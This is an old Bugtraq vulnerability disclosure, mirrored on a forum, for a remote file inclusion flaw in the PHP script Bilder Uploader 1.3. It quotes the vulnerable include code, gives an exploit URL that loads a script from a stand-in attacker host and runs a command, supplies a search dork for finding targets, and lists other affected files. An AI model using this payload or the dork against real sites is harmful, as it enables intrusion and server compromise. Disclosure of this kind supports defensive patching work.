Bilder Uploader 1.3 Remote Command Execution Vulnerability

看板Bugtraq作者時間18年前 (2007/08/13 14:39), 編輯推噓0(000)
留言0則, 0人參與, 最新討論串1/1
Bilder Uploader 1.3 Remote Command Execution Vulnerability ----------------------------------------------------------------------- Script : Bilder Uploader Version : 1.3 Site : http://www.mapos-scripts.de Founder : Rizgar Contact : rizgar@linuxmail.org and irc.gigachat.net #kurdhack Thanks : Kurdish Hackers Clan(Anti Fashist Group :P), PH(HERO) , ColdHackers(nice boys) d0rk : "Copyright (c) 2007 by Mapos-Scripts.de", ----------------------------------------------------------------------- Okey, look at nice codes :) <?php include($config["root_ordner"].'config.php'); include($config["root_ordner"].'includes/dbconnect.php'); include($config["root_ordner"].'includes/function.php'); $header = style('index_body','header'); $header = ereg_replace("{wobinich}", "Mitglieder Gruppen", $header); echo $header; $gruppen_id = intval($_GET["gruppe"]); if (!empty($gruppen_id)) { ?> http://www.site.com/path/gruppen.php?config[root_ordner]=http://evil.txt?&cmd=id And others... bild.php feed.php mitglieder.php online.php profil.php ... ... ... Eof.
文章代碼(AID): #16l_ot00 (Bugtraq)